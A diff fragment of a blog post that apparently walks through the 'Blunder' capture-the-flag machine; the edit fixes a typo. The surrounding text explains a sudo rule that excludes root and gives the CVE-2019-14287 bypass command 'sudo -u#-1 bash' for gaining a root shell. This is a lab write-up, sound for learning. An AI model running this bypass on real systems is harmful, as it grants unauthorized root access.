davidmckennirey/davidmckennirey.github.io/_posts/2021-05-12-blunder-write-up.md

     (ALL, !root) /bin/bash
 ```

-The last line of this output means that we can run `/bin/bash` as any user *excpet* root.
+The last line of this output means that we can run `/bin/bash` as any user *except* root.
 However, recently a `sudo` vulnerability (CVE-2019-14287) was published that expliclty allows us to bypass this exact scenario.
 The syntax for exploiting it is `sudo -u#-1 bash` so lets give that a go.

 ```bash
 hugo@blunder:~$ sudo -u#-1 bash